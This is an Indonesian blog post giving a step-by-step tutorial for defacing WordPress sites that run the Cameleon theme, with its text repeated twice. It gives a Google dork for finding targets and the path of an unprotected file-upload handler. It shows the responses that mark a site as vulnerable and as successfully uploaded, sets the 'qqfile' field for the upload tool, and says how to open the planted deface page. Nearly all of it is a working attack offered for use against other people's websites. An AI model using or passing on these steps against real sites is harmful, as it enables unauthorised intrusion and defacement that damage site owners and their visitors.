Tutorial Deface Metode Wp - Cameleon With CSRF
Rabu, 19 Februari 2020
Tambah Komentar
Hi sobat kali ini saya akan membagikan tutorial deface metode Wp-Cameleon.
Yukk Gasken
Dork: inurl:/wp-content/themes/cameleon/
Exploit: /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Step by Step :
1. Kalian dorking dulu di google setelah kalian dorking pilih salah 1 web dan tambahkan exploit nya contoh.
https://target.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Nanti kalo vuln itu ada bacaan {"error":"No files were uploaded."} contoh gambar di bawah
Nah itu tanda nya Vuln next kita ke tools csrf nya (Klik Disini)
Untuk di bagian :
Url: Target kalian yang tadi error
Post file: kalian isi dengan qqfile
Nah nanti kalo vuln ada bacaan sukses {"success":true,"url":"http:\/\/target.com\/wp-content\/uploads\/2020\/02\/v111.html","path":"\/home3\/ccserve1\/public_html\/silvertrading\/wp-content\/uploads\/2020\/02"}
Nah itu tanda nya sukses
Langsung kita panggil akses nya. Cara nya gmna? gampang tinggal tambahin akses nya di belakang url
Contoh https://target.com/wp-content/uploads/tahun/bulan/nama sc kalian.html
Tahun sama Bulan nanti sesuaikan sama yang tadi tanda sukses itu tahun berapa dan bulan berapa.
Dan hasil nya ke pepes ea:v
Good Luck!!
Yukk Gasken
Dork: inurl:/wp-content/themes/cameleon/
Exploit: /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Step by Step :
1. Kalian dorking dulu di google setelah kalian dorking pilih salah 1 web dan tambahkan exploit nya contoh.
https://target.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Nanti kalo vuln itu ada bacaan {"error":"No files were uploaded."} contoh gambar di bawah
Nah itu tanda nya Vuln next kita ke tools csrf nya (Klik Disini)
Untuk di bagian :
Url: Target kalian yang tadi error
Post file: kalian isi dengan qqfile
Nah nanti kalo vuln ada bacaan sukses {"success":true,"url":"http:\/\/target.com\/wp-content\/uploads\/2020\/02\/v111.html","path":"\/home3\/ccserve1\/public_html\/silvertrading\/wp-content\/uploads\/2020\/02"}
Nah itu tanda nya sukses
Langsung kita panggil akses nya. Cara nya gmna? gampang tinggal tambahin akses nya di belakang url
Contoh https://target.com/wp-content/uploads/tahun/bulan/nama sc kalian.html
Tahun sama Bulan nanti sesuaikan sama yang tadi tanda sukses itu tahun berapa dan bulan berapa.
Dan hasil nya ke pepes ea:v
Good Luck!!
Belum ada Komentar untuk "Tutorial Deface Metode Wp - Cameleon With CSRF"
Posting Komentar